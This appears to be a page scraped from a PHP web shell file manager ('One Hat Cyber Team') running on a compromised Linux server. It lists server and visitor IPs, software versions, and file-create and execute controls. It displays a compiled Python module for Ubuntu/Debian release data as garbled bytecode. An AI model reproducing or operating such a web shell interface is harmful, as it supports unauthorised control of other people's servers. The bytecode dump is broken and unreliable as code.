⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.30
Server IP:
45.79.8.107
Server:
Linux localhost 5.15.0-140-generic #150-Ubuntu SMP Sat Apr 12 06:00:09 UTC 2025 x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.2-1ubuntu2.21
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
python3
/
dist-packages
/
__pycache__
/
View File Name :
distro_info.cpython-310.pyc
o .ee0 @ s d Z ddlZddlZddlZdd Zdd ZG dd deZG d d d Zdd Z G d d dZ G dd de ZG dd de ZdS )z>provides information about Ubuntu's and Debian's distributions Nc C s | sd}|S dd | dD }t|dkr$|\}}}t|||}|S t|dkrK|\}}|dkr;t||d}|S t||d d td }|S td )z9Convert a date string in ISO 8601 into a datetime object.Nc S s g | ]}t |qS )int.0xr r -/usr/lib/python3/dist-packages/distro_info.py
s z convert_date.
.
- zDate not in ISO 8601 format.)splitlendatetimedate timedelta ValueError)stringr partsyearmonthdayr r r convert_date s r c C s dS )z4Get the data directory based on the module location.z/usr/share/distro-infor r r r r _get_data_dir* s r c s e Zd ZdZ fddZ ZS )DistroDataOutdatedzDistribution data outdated.c t d d S )NzDistribution data outdated. Please check for an update for distro-info-data. See /usr/share/doc/distro-info-data/README.Debian for details.super__init__self __class__r r r 2 s zDistroDataOutdated.__init__)__name__ __module____qualname____doc__r __classcell__r r r# r r / s r c @ s0 e Zd ZdZ dddZdd ZdS ) DistroReleasez"Represents a distributions releaseNc C s@ || _ || _|| _|| _|| _|| _|| _| | _|| _| | _ d S N) versioncodenameseriescreatedreleaseeoleol_ltseol_eltseol_esm eol_server)r" r, r- r. r/ r0 r1 r4 r2 r3 r5 r r r r ? s zDistroRelease.__init__c C s2 || j ko| jdu p|| jkp| jduo|| jkS )z:Check whether this release is supported on the given date.N)r/ r1 r5 r" r r r r is_supportedX s zDistroRelease.is_supported)NNNNNNN)r% r&